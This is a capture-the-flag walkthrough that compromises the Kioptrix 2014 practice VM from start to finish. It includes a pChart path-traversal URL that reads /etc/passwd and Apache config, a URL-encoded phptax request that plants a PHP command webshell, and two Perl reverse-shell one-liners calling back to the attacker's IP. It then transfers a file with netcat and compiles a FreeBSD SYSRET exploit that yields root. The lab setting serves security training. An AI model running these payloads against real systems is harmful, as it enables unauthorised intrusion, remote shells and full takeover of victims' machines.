KIOPTRIX 2014 VULNHUB VM WRITEUP

Let’s start with some standard nmap.

nmap -T4 -sV -p- --script discovery 192.168.120.135 -v

Output reveals some open ports.  Let’s begin enumerating!

Manually visiting the HTTP page reveals a plain page.  Looking at the source of ‘It Works’ on p80

<html>
<head>
<!--
<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">
-->
</head>

<body>
<h1>It works!</h1>
</body>
</html>

Manual browse to that path in browser / curl:

http://192.168.120.135/pChart2.1.3

 

Searchsploit reveals an LFI vuln for pChart.

https://www.exploit-db.com/exploits/31173/

 

Take advantage of the LFI to allow viewing passwd (take note of root’s shell)

http://192.168.120.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Why can’t I get on p8080? It is running Apache so what is going on?

I’ll use the LFI vuln of pChart to allow me to check out the Apache config, that might be something blocking me.  I’ll also check the firewall rules while I’m in there but given it is an APACHE 403 Error it is happening higher up the OSI than the firewall.  Still, in the interests of completeness…… Might come in handy later too!

This link will tell you the location of the conf file (it’s FreeBSD remember!)  https://www.freebsd.org/doc/handbook/network-apache.html

http://192.168.120.135/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2f/usr/local/etc/apache22/httpd.conf

It’s worth having a quick skim through here, before Ctrl+F for 8080.  Note the vhost on p8080

<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

</VirtualHost>

Accessing p8080 via changed User-Agent

Let’s try with a different user agent then it works. I used User Agent Overrider and created a quick profile for Mozilla4.  Here is a copy of my settings file.

Linux / Firefox 44: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Mac OS X/ Safari: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Windows / IE 11: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Windows / Edge: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586

Android / Chrome 40: Mozilla/5.0 (Linux; Android 5.1.1; Nexus 4 Build/LMY48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.89 Mobile Safari/537.36
iOS / Safari 9: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1

Google Bot: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
PS4: Mozilla/5.0 (PlayStation 4 3.15) AppleWebKit/537.73 (KHTML, like Gecko)
Curl: curl/7.43.0
 Mozilla4: Mozilla/4.0

MSF? No!

There is an msf module for phptax but that’s no fun – why take the easy route? Try harder!

Searchsploit reveals an exploit for phptax: https://www.exploit-db.com/exploits/25849/

Looking at the exploit it is just fancy wrapper for creating a a new PHP file. What happens if I just access the URL manually (making sure user agent is correct!) via plain old copy paste?!

http://192.168.120.136:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru%28%24_GET[cmd]%29%3B%3F%3E

Then look in data/pdf directory and I can see it.  I knew it was this directory because another exploit listed this as the DATADIR.  It would be pretty strange if the webapp couldn’t write to it’s own data dir!

Initial Shell

I can now run commands and see the output.

http://192.168.120.136:8080/phptax/data/rce.php?cmd=uname -a

Perl reverse shell (keep trying until you get a language that’s installed, or you can enumerate the languages manually before you try and throw a rev shell.

Hint:

Use these commands to find out a bit about the environment:

find / -name perl* 

find / -name python* 

find / -name gcc* 

find / -name cc

Initial perl shell did not work:

perl -e 'use Socket;$i="192.168.120.132";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/csh -i");};'

I knew Perl was isntalled so tried an alternative – don’t give up at first hurdle!  This gave me an initial foothold on the host.

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.120.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

On my listener:

root@kali:~/Downloads/# nc -lnvp 443
listening on [any] 443 ...
connect to [192.168.120.132] from (UNKNOWN) [192.168.120.136] 37621
id
uid=80(www) gid=80(www) groups=80(www)
whoami
www
hostname
kioptrix2014

Add in a TTY using:

/bin/csh -i

Note – you can see that this is definitely an installed shell as root has it set in /etc/passwd

I already know a bit about the environment and I know FreeBSD 9 has a common vuln. Grab a copy of SYSRET priv esc from offline repo:

cp /usr/share/exploitdb/platforms/freebsd/local/28718.c . (note the dot for current dir)

SimpleHTTPServer didn’t seem to work so I copied it into /var/www/html

File Transfer

Manually http download it using netcat
In the shell enter:

nc 192.168.120.132 80 > privesc.c
GET 28718.c HTTP/1.0 (no need for full http path)

Trimming File

Now we need to remove the HTTP headers at the top. Count the lines in the file, then minus 7 and use Tail to get that number of lines and pipe into a new file.  Or even use nano 🙂

wc -l privesc1.c
185 privesc1.c
tail -178 privesc1.c > compileme
cat compileme

gcc compileme -o privesc

The exploit still wouldn’t compile and I had to job control to see gcc output (you could pipe it into a text file and then manually cat it however). I thought it might have got corrupted somewhere in the HTTP download so tried to use nc to transfer it instead.

On attacking box:

nc -lnvp 4444 < 28718.c (make sure to use different port to initial shell!)

On target:

nc 192.168.120.132 4444 > sysret.c

NC will download file but you have no TTY so can’t see it. Kill original webshell and respawn it then check to see if file has downloaded.

Compile SYSRET

gcc sysret.c -o privescexploit

Change permissions to executable:

chmod a+x privescexploit and check:

kioptrix2014# chmod a+x privescexploit
kioptrix2014# ls -alt privesc*
-rwxr-xr-x 1 www wheel 10407 Jul 25 16:33 privescexploit
-rw-r--r-- 1 www wheel 5753 Jul 25 16:20 privesc1.c

./privescexploit

r00t achieved!

kioptrix2014# ./privescexploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
kioptrix2014# id
uid=0(root) gid=0(wheel) groups=0(wheel)
kioptrix2014#

Get in touch if you have any problems following the walkthough.  There are at least two other ways – one MSF and one using the other EDB exploit however I spent a while spinning my wheels (nice FreeBSD pun!) in syntax errors that made limited sense!